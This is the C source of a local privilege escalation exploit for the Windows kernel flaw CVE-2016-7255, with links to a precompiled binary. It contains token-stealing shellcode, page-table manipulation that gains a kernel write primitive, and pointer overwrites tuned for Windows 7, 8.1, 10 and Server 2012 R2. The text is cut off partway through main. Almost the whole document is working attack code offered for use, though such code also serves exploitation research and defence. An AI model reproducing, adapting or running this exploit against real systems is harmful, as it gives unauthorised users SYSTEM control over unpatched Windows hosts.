https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe\r\n*/\r\n \r\n// ricklarabee.blogspot.com\r\n \r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n \r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n \r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n \r\n// Credits: [email\u00a0protected]: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n \r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n \r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n \r\n////////////////////////////////////////////////////////\r\n// Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n \r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n \r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n OUT PULONG ReturnLength);\r\n \r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n OUT PULONG Interval);\r\n \r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n //0xcc,\r\n 0xfa, // CLI\r\n 0x9c, // PUSHFQ\r\n 0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer\r\n 0x50, // PUSH RAX\r\n 0x51, // PUSH RCX\r\n 0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n 0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX\r\n 0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID\r\n 0x53, // PUSH RBX\r\n \r\n 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188\r\n 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n 0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n //<tag>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n 0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4\r\n 0x75, 0xf3, // JNE <tag>\r\n 0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n \r\n 0x53, // PUSH RBX\r\n //<tag2>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n 0x39, 0xcb, // CMP EBX, ECX // our PID\r\n 0x75, 0xf5, // JNE <tag2>\r\n 0x5b, // POP RBX\r\n 0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX\r\n \r\n 0x5b, // POP RBX\r\n 0x59, // POP RCX\r\n 0x58, // POP RAX\r\n 0x9d, // POPFQ\r\n \r\n 0xfb, // STI\r\n 0xff, 0xe0 // JMP RAX\r\n};\r\n \r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList = NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n \r\n va_start(VaList, Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n \r\n \r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\nint _sim_key_down(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_key_up(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_alt_shift_esc()\r\n{\r\n int i = 0;\r\n \r\n do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n for (i = 0; i < nCount; i++)\r\n {\r\n _sim_key_down(VK_TAB);\r\n _sim_key_up(VK_TAB);\r\n \r\n Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\nint _sim_alt_esc(int count)\r\n{\r\n int i = 0;\r\n \r\n for (i = 0; i<count; i++)\r\n {\r\n _sim_key_down(VK_MENU);\r\n //_sim_key_down(VK_SHIFT);\r\n \r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n //_sim_key_up(VK_SHIFT);\r\n \r\n }\r\n \r\n return 0;\r\n}\r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = { 0 };\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = { 0 };\r\n \r\n UINT64 value = 0;\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if (0 == RegisterClassExW(&stWC))\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n#ifdef _WIN64\r\n pId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n pId = ((UCHAR*)pAddress - 0x14);\r\n#endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n \r\n ShowWindow(hWndParent, SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild, GetDesktopWindow());\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild, TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n while (GetMessage(&stMsg, NULL, 0, 0)) {\r\n \r\n SetFocus(hWndParent);\r\n _sim_alt_esc(20);\r\n SetFocus(hWndChild);\r\n _sim_alt_esc(20);\r\n \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n \r\n if (value != 0) {\r\n break;\r\n }\r\n \r\n \r\n __try {\r\n value = *(UINT64 *)PML4_SELF_REF;\r\n if ((value & 0x67) == 0x67) {\r\n printf(\"Value Self Ref = %llx\\n\", value);\r\n break;\r\n }\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER) {\r\n continue;\r\n }\r\n \r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if (NULL != hWndParent)\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if (NULL != hWndChild)\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n \r\n return 0;\r\n}\r\n \r\nUINT64 get_pxe_address(UINT64 address) {\r\n UINT entry = PML4_SELF_REF_INDEX;\r\n UINT64 result = address >> 9;\r\n UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n result = result | lower_boundary;\r\n result = result & upper_boundary;\r\n return result;\r\n}\r\n \r\nUINT64 look_free_entry_pml4(void) {\r\n // Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n int offset = 0xF00;\r\n UINT64 pml4_search = PML4_BASE + offset;\r\n while (offset < 0xFF8)\r\n {\r\n if ((*(PVOID *)pml4_search) == 0x0)\r\n {\r\n // This is a NULL (free) entry\r\n break;\r\n }\r\n offset += 8;\r\n pml4_search = PML4_BASE + offset;\r\n }\r\n return pml4_search;\r\n}\r\n \r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n UINT64 index = (spurious_offset & 0xFFF) / 8;\r\n UINT64 result = (\r\n ((UINT64)0xFFFF << 48) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n (index << 12)\r\n );\r\n return result;\r\n}\r\n \r\n \r\n \r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n \r\n /*\r\n 1: kd> !pte ffffffff`ffd00000\r\n VA ffffffffffd00000\r\n PXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n contains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n pfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n */ \r\n \r\n UINT64 pte = get_pxe_address(virtual_address);\r\n int pte_offset = pte & 0xFFF;\r\n //printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n \r\n UINT64 pde = get_pxe_address(pte);\r\n int pde_offset = pde & 0xFFF;\r\n //printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n \r\n UINT64 pdpte = get_pxe_address(pde);\r\n int pdpte_offset = pdpte & 0xFFF;\r\n //printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n \r\n UINT64 pml4e = get_pxe_address(pdpte);\r\n int pml4e_offset = pml4e & 0xFFF;\r\n //printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n \r\n UINT64 spurious_offset = look_free_entry_pml4();\r\n printf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n UINT64 f_e_pml4 = spurious_offset;\r\n UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\r\n printf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\r\n printf(\"--------------------------------------------------\\n\\n\");\r\n \r\n \r\n //Read the physical address of pml4e \r\n UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n printf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\r\n // Change the PxE\r\n pml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n \r\n printf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pdpte\r\n UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n printf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n // Change the PxE\r\n pdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pde\r\n UINT64 pde_addr = spurious_pt + pde_offset;\r\n UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n printf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n // Change the PxE\r\n pde_pfn = pde_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pte\r\n UINT64 pte_addr = spurious_pt + pte_offset;\r\n UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n printf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n // Change the PxE\r\n pte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n if (patch_original) {\r\n printf(\"*** Patching the original location to enable NX...\\n\");\r\n *(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\r\n }\r\n \r\n printf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n printf(\"\\n\\n\");\r\n return spurious_pt;\r\n}\r\n \r\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n printf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteAddress += (target_address & 0xFFF);\r\n printf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n \r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteTarget += (target_address & 0xFFF);\r\n UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n printf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n *(PVOID *)target = (PVOID)hook_address;\r\n}\r\n \r\n \r\nUINT64 store_shellcode_in_hal(void) {\r\n //// Finally store the shellcode on the HAL\r\n \r\n UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n \r\n printf(\"HAL address: %llx\\n\", hal_heap);\r\n // 0xffffffffffd00d50 this is a good offset to store shellcode \r\n // 0xfff - 0xd50 = 0x2af space\r\n \r\n memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n return 0xffffffffffd00d50;\r\n}\r\n \r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\r\n \r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\r\n \r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n \r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n \r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n \r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n \r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n \r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n \r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n \r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n \r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n \r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n \r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n \r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n \r\n return HalDispatchTable;\r\n}\r\n \r\nint __cdecl main(int argc, char** argv)\r\n{\r\n TCHAR pre_username[256];\r\n TCHAR post_username[256];\r\n DWORD size = 256;\r\n ULONG Interval = 0;\r\n HMODULE hNtDll = NULL;\r\n UINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n int osversion;\r\n \r\n if (argc != 2) {\r\n printf(\"Please enter an OS version\\n\");\r\n printf(\"The following OS'es are supported:\\n\");\r\n printf(\"\\t[*] 7 - Windows 7\\n\");\r\n printf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n printf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n printf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n printf(\"\\n\");\r\n printf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n return -1;\r\n }\r\n \r\n osversion = _strtoui64(argv[1], NULL, 10);\r\n \r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 0x8; // QueryIntervalProfile \r\n }\r\n else if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 10)\r\n {\r\n // the target machine's OS is Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n printf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n printf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n printf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n printf(\"Current Username: %s\\n\", pre_username);\r\n printf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n printf(\"Enter to continue...\\n\");\r\n getchar();\r\n \r\n do\r\n {\r\n or_address_value_4((void*)PML4_SELF_REF);\r\n } while (FALSE);\r\n \r\n PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n printf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n \r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n \r\n printf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n DWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! */\r\n char *p = shellcode;\r\n p += 4; // skip the CLI, PUSHF and MOV RAX bytes \r\n *(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n \r\n p += 12; // Patch shellcode with original value in the Overwrite address\r\n *(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n \r\n p += 12; // To patch the PID of our process\r\n \r\n *(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n printf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n \r\n if (osversion == 7){\r\n // Exploit Win7.1\r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t[-] Failed loading NtDll: 